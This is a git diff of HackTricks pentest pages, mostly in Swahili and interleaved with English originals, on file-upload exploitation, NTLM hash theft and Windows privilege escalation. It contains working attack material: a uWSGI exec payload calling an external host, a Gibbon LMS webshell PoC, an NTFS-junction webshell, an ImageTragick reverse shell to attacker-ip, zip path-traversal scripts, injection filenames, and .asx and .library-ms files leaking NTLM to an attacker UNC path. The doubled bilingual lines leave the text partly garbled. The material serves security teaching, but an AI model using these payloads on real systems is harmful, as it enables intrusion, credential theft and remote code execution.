Udhaifu za Remote Command Execution (RCE) zinaweza kutumiwa kwenye servers za uWSGI ikiwa mtu ana uwezo wa kubadilisha faili ya usanidi `.ini`. Faili za usanidi za uWSGI zinatumia sintaksia maalum kuingiza "magic" variables, placeholders, na operators. Kwa mfano, operator '@', inayotumika kama `@(filename)`, imekusudiwa kujumuisha yaliyomo ya faili. Kati ya schemes mbalimbali zinazoungwa mkono na uWSGI, scheme ya "exec" ni hatari hasa, ikiruhusu kusoma data kutoka kwa standard output ya mchakato. Kipengele hiki kinaweza kutumiwa kwa madhumuni mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati faili ya usanidi `.ini` inapoproseswa.
Tafakari mfano ufuatao wa hatari wa `uwsgi.ini` file, unaoonyesha schemes mbalimbali:
Angalia mfano ufuatao wa faili hatari ya `uwsgi.ini`, unaoonyesha schemes mbalimbali:
```ini
[uwsgi]
; read from a symbol
@ -156,20 +156,20 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
Utekelezaji wa payload hufanyika wakati faili ya usanidi inachanganuliwa. Ili usanidi uanze kutumika na kuchanganuliwa, mchakato wa uWSGI lazima uanzishwe upya (kwa mfano baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa ku-auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, kinapakia tena faili kwa vipindi vilivyobainishwa linapogundua mabadiliko.
Utekelezaji wa payload hutokea wakati wa kufasiri faili ya usanidi. Ili usanidi uanze kutumika na kufasiriwa, mchakato wa uWSGI lazima uanzishwe upya (pengine baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa ku-auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, kinareload faili kwa interval maalum linapogundua mabadiliko.
Ni muhimu kuelewa jinsi uchanganaji wa faili za usanidi za uWSGI unavyokuwa mwepesi. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama picha au PDF), jambo linalopanua zaidi wigo wa potential exploitation.
Ni muhimu kuelewa jinsi uWSGI unavyokuwa laini katika kufasiri faili za usanidi. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama picha au PDF), ikipanua wigo wa exploitation.
### Gibbon LMS arbitrary file write to pre-auth RCE (CVE-2023-45878)
Endpoint isiyothibitishwa katika Gibbon LMS inaruhusu uandishi wa faili kwa makusudi ndani ya web root, ikisababisha pre-auth RCE kwa kuacha faili ya PHP. Toleo zilizoathirika: hadi na pamoja na 25.0.01.
Unauthenticated endpoint in Gibbon LMS inaruhusu arbitrary file write ndani ya web root, ikisababisha pre-auth RCE kwa ku-drop PHP file. Vulnerable versions: up to and including 25.0.01.
- Endpoint: `/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php`
- Njia: POST
- Vigezo vinavyohitajika:
- `img`: data-URI-like string: `[mime];[name],[base64]` (server inapuuza type/name, inafanya base64-decode sehemu ya mwisho)
- `path`: jina la faili linalolengwa kulingana na Gibbon install dir (e.g., `poc.php` or `0xdf.php`)
- `gibbonPersonID`: thamani yoyote isiyo tupu inakubaliwa (e.g., `0000000001`)
- Method: POST
- Required params:
- `img`: data-URI-like string: `[mime];[name],[base64]` (seva inapuuza type/name, inafanya base64-decode sehemu ya mwisho)
- `path`: destination filename relative to Gibbon install dir (e.g., `poc.php` or `0xdf.php`)
- `gibbonPersonID`: any non-empty value is accepted (e.g., `0000000001`)
Minimal PoC ya kuandika na kusoma tena faili:
```bash
@ -184,7 +184,7 @@ curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
# Verify write
curl http://target/Gibbon-LMS/poc.php
```
Pakia webshell mdogo na endesha amri:
Weka webshell ndogo na endesha commands:
```bash
# '<?php system($_GET["cmd"]); ?>' base64
# PD9waHAgIHN5c3RlbSgkX0dFVFsiY21kIl0pOyA/Pg==
@ -195,15 +195,15 @@ curl http://target/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php \
curl 'http://target/Gibbon-LMS/shell.php?cmd=whoami'
```
Vidokezo:
- Mshughuliki hufanya `base64_decode($_POST["img"])` baada ya kugawanya kwa `;` na `,`, kisha inaandika bytes kwa `$absolutePath . '/' . $_POST['path']` bila kuthibitisha extension/type.
- Msimbo utakaotokana unaendesha kama mtumiaji wa web service (kwa mfano, XAMPP Apache on Windows).
- Handler inafanya `base64_decode($_POST["img"])` baada ya kugawanya kwa `;` na `,`, kisha inaandika bytes kwenye `$absolutePath . '/' . $_POST['path']` bila kuthibitisha extension/type.
- Msimbo uliotokana unakimbia kama mtumiaji wa web service (mfano, XAMPP Apache on Windows).
References for this bug include the usd HeroLab advisory and the NVD entry. See the References section below.
## **wget File Upload/SSRF Trick**
## **wget File Upload/SSRF Mbinu**
Katika baadhi ya matukio unaweza kugundua kuwa seva inatumia **`wget`** kupakua **faili** na unaweza **kuonyesha** **URL**. Katika hali hizi, msimbo unaweza kuwa unakagua kwamba extension ya faili zilizopakuliwa iko kwenye whitelist ili kuhakikisha kwamba ni faili zilizoruhusiwa tu zitakazopakuliwa. Hata hivyo, **ukaguzi huu unaweza kuvukiwa.**\
Urefu wa **maximum** wa **filename** katika **linux** ni **255**, hata hivyo, **wget** hupunguza majina ya faili hadi **236** characters. Unaweza **download a file called "A"*232+".php"+".gif"**, jina hili la faili lita**bypass** **check** (kama katika mfano huu **".gif"** ni **valid** extension) lakini `wget` itanipa jina jipya la faili kuwa **"A"*232+".php"**.
Katika baadhi ya matukio unaweza kugundua kuwa server inatumia **`wget`** kupakua **files** na unaweza **kuonyesha** **URL**. Katika hizi kesi, code inaweza kukagua kwamba extension ya faili zilizopakuliwa iko ndani ya whitelist ili kuhakikisha kwamba ni faili zilizoruhusiwa pekee zitatakapotolewa. Hata hivyo, **ukaguzi huu unaweza kupitishwa.**\
Urefu wa **maximum** wa jina la **filename** kwenye **linux** ni **255**, hata hivyo, **wget** hupunguza majina ya faili hadi **236** herufi. Unaweza **download a file called "A"*232+".php"+".gif"**, jina hili la faili lita**bypass** ukaguzi (kama katika mfano huu **".gif"** ni extension **valid**) lakini `wget` itafanya **rename** ya faili kuwa **"A"*232+".php"**.
```bash
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
@ -228,33 +228,58 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
```
Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
## Zana
### Kutoroka kwa upload directory kwa kutumia NTFS junctions (Windows)
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu mifumo ya kupakia faili. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kutambua na kutumia udhaifu, ikihakikisha tathmini kamili za web applications.
(Kwa shambulio hili utahitaji local access kwa mashine ya Windows) Wakati uploads zinahifadhiwa chini ya subfolders za kila mtumiaji kwenye Windows (mfano, C:\Windows\Tasks\Uploads\<id>\) na unadhibiti uundaji/ufutaji wa subfolder hiyo, unaweza kuibadilisha na directory junction inayoleta kwenye eneo nyeti (mfano, webroot). Uploads zinazofuata zitaandikwa kwenye target path, na hivyo kuwezesha utekelezaji wa code ikiwa target inatafsiri serverside code.
Example flow to redirect uploads into XAMPP webroot:
```cmd
:: 1) Upload once to learn/confirm your per-user folder name (e.g., md5 of form fields)
:: Observe it on disk: C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
:: 2) Remove the created folder and create a junction to webroot
rmdir C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
cmd /c mklink /J C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882 C:\xampp\htdocs
:: 3) Re-upload your payload; it lands under C:\xampp\htdocs
:: Minimal PHP webshell for testing
:: <?php echo shell_exec($_REQUEST['cmd']); ?>
:: 4) Trigger
curl "http://TARGET/shell.php?cmd=whoami"
```
Notes
- mklink /J creates an NTFS directory junction (reparse point). Akaunti ya web server lazima ifuate junction na iwe na idhini ya kuandika kwenye mahali lengwa.
- This redirects arbitrary file writes; if the destination executes scripts (PHP/ASP), this becomes RCE.
- Defenses: dont allow writable upload roots to be attackercontrollable under C:\Windows\Tasks or similar; block junction creation; validate extensions serverside; store uploads on a separate volume or with denyexecute ACLs.
## Tools
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
### Corrupting upload indices with snprintf quirks (historical)
Baadhi ya upload handlers za zamani ambazo zinatumia `snprintf()` au sawa ili kujenga arrays za faili nyingi kutoka kwa upload ya faili moja zinaweza kudanganywa kujifanya zinafanya forge ya muundo wa `_FILES`. Kutokana na kutokukamilika na kukatwa kwa tabia ya `snprintf()`, upload iliyoundwa kwa uangalifu inaweza kuonekana kama faili nyingi zilizo na index kwenye upande wa server, ikachanganya mantiki inayodhani muundo thabiti (mfano, kuitaza kama upload ya faili nyingi na kuchukua matawi hatarishi). Ingawa ni nadra leo, muundo huu wa “index corruption” mara kwa mara huibuka tena katika CTFs na codebases za zamani.
Some legacy upload handlers that use `snprintf()` or similar to build multi-file arrays from a single-file upload can be tricked into forging the `_FILES` structure. Due to inconsistencies and truncation in `snprintf()` behavior, a carefully crafted single upload can appear as multiple indexed files on the server side, confusing logic that assumes a strict shape (e.g., treating it as a multi-file upload and taking unsafe branches). While niche today, this “index corruption” pattern occasionally resurfaces in CTFs and older codebases.
## From File upload to other vulnerabilities
- Weka **filename** kuwa `../../../tmp/lol.png` na jaribu kupata **path traversal**
- Weka **filename** kuwa `sleep(10)-- -.jpg` na huenda ukaweza kupata **SQL injection**
- Weka **filename** kuwa `<svg onload=alert(document.domain)>` ili kupata XSS
- Weka **filename** kuwa `; sleep 10;` ili kujaribu command injection (more [command injections tricks here](../command-injection.md))
- Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
- Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
- Set **filename** to `<svg onload=alert(document.domain)>` to achieve a XSS
- Set **filename** to `; sleep 10;` to test some command injection (more [command injections tricks here](../command-injection.md))
- [**XSS** in image (svg) file upload](../xss-cross-site-scripting/index.html#xss-uploading-files-svg)
- **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/index.html#xss-abusing-service-workers)
- [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Jaribu **different svg payloads** kutoka [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
- Ikiwa unaweza **kuonyesha web server ichukue picha kutoka kwa URL** unaweza kujaribu kubadilisha kwa kutumia [SSRF](../ssrf-server-side-request-forgery/index.html). Ikiwa picha hii itahifadhiwa kwenye tovuti **public**, unaweza pia kuonyesha URL kutoka [https://iplogger.org/invisible/](https://iplogger.org/invisible/) na **kuiba taarifa za kila mgeni**.
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/] and **steal information of every visitor**.
- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
- PDF zilizotengenezwa kwa njia maalumu kwa XSS: Ukurasa wa [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). Ikiwa unaweza kupakia PDFs unaweza kuandaa PDF itakayotekeleza JS kwa mujibu wa maelekezo yaliyotolewa.
- Pakia yaliyomo ya \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) ili kuangalia kama server ina **antivirus**
- Angalia kama kuna **kizuizi cha ukubwa** wakati wa kupakia faili
- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
- Check if there is any **size limit** uploading files
Hapa kuna orodha ya top 10 ya mambo unayoweza kufanya kwa kupakia (kutoka [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
Heres a top 10 list of things that you can achieve by uploading (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
2. **SVG**: Stored XSS / SSRF / XXE
@ -279,34 +304,34 @@ https://github.com/portswigger/upload-scanner
- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["`
- **JPG**: `"\xff\xd8\xff"`
Rejea [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa aina nyingine za faili.
Refer to [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) for other filetypes.
## Zip/Tar File Automatically decompressed Upload
Ikiwa unaweza kupakia ZIP ambayo itafunguliwa ndani ya server, unaweza kufanya vitu 2:
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
### Symlink
Pakia archive lenye soft links kuelekea kwa faili nyingine, kisha kwa kufikia faili zilizofunguliwa utaweza kufikia faili zilizohusishwa:
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Kufungua (decompress) katika folda tofauti
### Kutoa yaliyokandamizwa katika folda tofauti
Uundaji wa mafaili yasiyotarajiwa ndani ya directories wakati wa decompression ni tatizo kubwa. Ingawa awali mtu angefikiri kwamba mpangilio huu unaweza kuzuia OS-level command execution kupitia malicious file uploads, msaada wa hierarchical compression na uwezo wa directory traversal wa fomati ya ZIP unaweza kutumika vibaya. Hii inawawezesha attackers kupita vikwazo na kutoroka kutoka kwa secure upload directories kwa kudanganya decompression functionality ya application iliyolengwa.
Uundaji usiotarajiwa wa faili katika saraka wakati wa kutolewa kwa yaliyokandamizwa ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu ungeweza kuzuia utekelezaji wa amri za OS-level kupitia file uploads zenye madhara, msaada wa compression wenye hierarki na uwezo wa directory traversal wa ZIP archive format unaweza kutumika vibaya. Hii inawawezesha wadukuzi kupita vikwazo na kutoka kwenye saraka salama za upload kwa kudanganya kazi ya decompression ya application lengwa.
Automated exploit ya kutengeneza mafaili kama hayo inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo:
Exploit ya kiotomatiki kutengeneza faili kama hizo inapatikana kwenye [**evilarc kwenye GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama ifuatavyo:
```python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
Zaidi ya hayo, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa kuendesha.
Aidha, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitakutana na makosa wakati wa utekelezaji wake.
Hapo chini kuna mfano wa Python code unaotumika kuunda faili ya zip yenye madhara:
Hapo chini kuna mfano wa Python code inayotumiwa kuunda zip file yenye madhumuni mabaya:
```python
#!/usr/bin/python
import zipfile
@ -325,11 +350,11 @@ zip.close()
create_zip()
```
**Kutumia vibaya compression kwa file spraying**
**Abusing compression for file spraying**
Kwa maelezo zaidi **angalia chapisho la asili katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
1. **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia variable `$_REQUEST`.
1. **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri ambazo zinapitishwa kupitia kigezo `$_REQUEST`.
```php
<?php
@ -339,14 +364,14 @@ system($cmd);
}?>
```
2. **File Spraying and Compressed File Creation**: Faili nyingi zinaumbwa na archive ya zip inajengwa ikijumuisha faili hizi.
2. **File Spraying and Compressed File Creation**: Mafaili mengi yanaundwa na archive ya zip inatengenezwa ikiwa na mafaili haya.
```bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
```
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yanabadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwenye directories.
3. **Modification with a Hex Editor or vi**: Majina ya mafaili ndani ya zip yamebadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita saraka.
```bash
:set modifiable
@ -356,38 +381,38 @@ root@s2crew:/tmp# zip cmd.zip xx*.php
## ImageTragic
Pakia yaliyomo haya kwa extension ya picha ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (tazama [exploit](https://www.exploit-db.com/exploits/39767))
Pakia yaliyomo haya ukiwa na extension ya picha ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (toka kwenye [exploit](https://www.exploit-db.com/exploits/39767))
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
## Embedding PHP Shell on PNG
## Kuingiza PHP Shell ndani ya PNG
Kuingiza PHP shell ndani ya chunk ya IDAT ya faili ya PNG kunaweza kuzuia kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funsioni `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani kwa kawaida zinatumiwa kwa resizing na resampling ya picha, mtawalia. Uwezo wa PHP shell iliyojazwa kubaki isiyoathiriwa na operesheni hizi ni faida muhimu kwa matumizi fulani.
Kuingiza PHP shell katika IDAT chunk ya faili ya PNG kunaweza kupitisha kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funguo za `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwa kuwa hutumiwa mara kwa mara kwa kubadilisha ukubwa na resampling ya picha, mtawaliwa. Uwezo wa PHP shell iliyowekwa kukaa bila kuathiriwa na operesheni hizi ni faida muhimu kwa matumizi fulani.
Uchambuzi wa kina wa mbinu hii, ikiwa ni pamoja na metodolojia na matumizi yake yanayowezekana, unapatikana katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
Uchambuzi wa kina wa mbinu hii, ikijumuisha metodologia na matumizi yanayoweza, umeelezewa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
More information in: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
## Polyglot Files
## Faili za Polyglot
Polyglot files zinatumika kama zana ya kipekee katika usalama wa mtandao, zikifanya kazi kama chameleon ambazo zinaweza kuwepo kwa uhalali katika miundo mbalimbali ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), nyongeza inayofanya kazi wakati huo huo kama GIF na archive ya RAR. Faili hizi hazizuiliki kwa jozi hii tu; mchanganyiko kama GIF na JS au PPT na JS pia inawezekana.
Faili za polyglot ni chombo maalum katika cybersecurity, zikifanya kazi kama kamelon ambazo zinaweza kuwepo kwa uhalali katika miundo mingi ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), mseto unaofanya kazi kama GIF na pia kama RAR archive. Faili kama hizi haziko tu kwa mseto huo; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Faida kuu ya polyglot files iko katika uwezo wao wa kuepuka viwango vya usalama vinavyoscreen faili kulingana na aina. Mazoezi ya kawaida katika programu mbalimbali ni kuruhusu aina maalum za faili kwa upload—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na muundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kufuata vigezo vya muundo vya aina nyingi za faili, inaweza kupita kwa utupu vikwazo hivi kwa siri.
Manufaa ya msingi ya faili za polyglot yako katika uwezo wake wa kuepuka hatua za usalama ambazo hupima faili kwa msingi wa aina. Mazingira mengi huruhusu aina fulani tu za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na miundo hatari (mfano, JS, PHP, au Phar). Hata hivyo, polyglot, kwa kufuata vigezo vya muundo vya aina mbalimbali za faili, inaweza kupitisha vikwazo hivi kwa utulivu.
Licha ya ufanisi wao, polyglots hukutana na vizingiti. Kwa mfano, wakati polyglot inaweza kuwa PHAR file (PHp ARchive) na JPEG kwa pamoja, mafanikio ya upload yake yanaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazokubaliwa, uraia wa muundo wa polyglot peke yake unaweza kutokutosha kuhakikisha upload yake.
Licha ya kubadilika kwao, polyglots zina mipaka. Kwa mfano, ingawa polyglot inaweza kwa wakati mmoja kuwa faili ya PHAR (PHp ARchive) na JPEG, mafanikio ya upakiaji wake yanaweza kutegemea sera za extensions za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazokubalika, utambulisho wa muundo wa polyglot peke yake unaweza kutokuwa na uwezo wa kuhakikisha upakiaji wake.
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
### Upload valid JSONs like if it was PDF
### Kupakia JSON halali kana kwamba ni PDF
Jinsi ya kuepuka detection za aina ya faili kwa kupakia faili halali ya JSON hata kama haikuruhusiwa kwa kuiga faili ya PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
How to avoid file type detections by uploading a valid JSON file even if not allowed by faking a PDF file (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
- **`mmmagic` library**: Iwapo tu magic bytes `%PDF` ziko katika 1024 ya kwanza, inachukuliwa kuwa halali (pata mfano kutoka kwenye post)
- **`pdflib` library**: Weka muundo bandia wa PDF ndani ya field ya JSON ili library ianze kuifikiria kuwa ni pdf (pata mfano kutoka kwenye post)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Unda JSON kubwa kuliko hiyo ili isiweze kuchambua yaliyomo kama json kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani kuwa ni PDF
- **`mmagic` library**: Iwapo tu magic bytes `%PDF` ziko katika 1024 za kwanza za faili, inachukuliwa kuwa halali (angalia mfano kwenye chapisho).
- **`pdflib` library**: Ongeza muundo wa PDF wa uongo ndani ya field ya JSON ili maktaba ifikiri ni PDF (angalia mfano kwenye chapisho).
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwenye faili. Unda JSON kubwa kuliko hiyo ili haiwezi kuchambua yaliyomo kama JSON, kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani ni PDF.
## Marejeo
@ -405,5 +430,7 @@ Jinsi ya kuepuka detection za aina ya faili kwa kupakia faili halali ya JSON hat
- [CVE-2024-21546 NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546)
- [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)
- [0xdf HTB Environment (UniSharp LFM upload → PHP RCE)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
- [Microsoft mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink)
{{#include ../../banners/hacktricks-training.md}}

63
src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
View File

@ -1,7 +1,66 @@
# Mahali pa kuiba NTLM creds
# Places to steal NTLM creds
{{#include ../../banners/hacktricks-training.md}}
**Angalia mawazo mazuri kutoka [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) kutoka kwa upakuaji wa faili ya microsoft word mtandaoni hadi chanzo cha ntlm leaks: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md na [https://github.com/p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)**
**Angalia mawazo mazuri yote kutoka [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) — kuanzia kupakua faili ya Microsoft Word mtandaoni hadi kwenye ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md na [https://github.com/p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)**
### Orodha za kucheza za Windows Media Player (.ASX/.WAX)
Ikiwa unaweza kumfanya target kufungua au kutazama awali orodha ya kucheza ya Windows Media Player unayodhibiti, unaweza leak NetNTLMv2 kwa kuelekeza kipengee kwenye path ya UNC. WMP itajaribu kupata media iliyorejelewa kupitia SMB na itauthenticate implicitly.
Mfano payload:
```xml
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>
```
Mtiririko wa ukusanyaji na cracking:
```bash
# Capture the authentication
sudo Responder -I <iface>
# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
```
### ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)
Windows Explorer inashughulikia kwa njia isiyo salama faili za .library-ms wakati zinapofunguliwa moja kwa moja ndani ya archive ya ZIP. Ikiwa ufafanuzi wa library unaelekeza kwenye njia ya mbali ya UNC (mfano, \\attacker\share), kuvinjari/kuanzisha tu .library-ms ndani ya ZIP kunasababisha Explorer kuorodhesha UNC na kutuma uthibitisho wa NTLM kwa mshambuliaji. Hii inatoa NetNTLMv2 ambayo inaweza kuvunjwa offline au ku-relay.
Mfano mdogo wa .library-ms unaoelekeza kwenye UNC ya mshambuliaji
```xml
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
```
Hatua za uendeshaji
- Unda faili .library-ms kwa kutumia XML iliyo hapo juu (weka IP/hostname yako).
- Weka kwenye ZIP (kwa Windows: Send to → Compressed (zipped) folder) kisha ukabidhi ZIP kwa lengo.
- Endesha NTLM capture listener na usubiri athiriwa afungue .library-ms kutoka ndani ya ZIP.
## Marejeo
- [HTB Fluffy ZIP .libraryms auth leak (CVE202524071/24055) → GenericWrite → AD CS ESC16 to DA (0xdf)](https://0xdf.gitlab.io/2025/09/20/htb-fluffy.html)
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
- [Morphisec 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft](https://www.morphisec.com/blog/5-ntlm-vulnerabilities-unpatched-privilege-escalation-threats-in-microsoft/)
{{#include ../../banners/hacktricks-training.md}}

49
src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
View File

@ -24,21 +24,22 @@ privilege-escalation-abusing-tokens.md
## Requirements and common gotchas
All the following techniques rely on abusing an impersonation-capable privileged service from a context holding either of these privileges:
Mbinu zote zifuatazo zinategemea kuabusu huduma yenye uwezo wa impersonation yenye vibali kutoka kwa muktadha ambao unashikilia moja ya ya vibali vifuatavyo:
- SeImpersonatePrivilege (maarufu zaidi) or SeAssignPrimaryTokenPrivilege
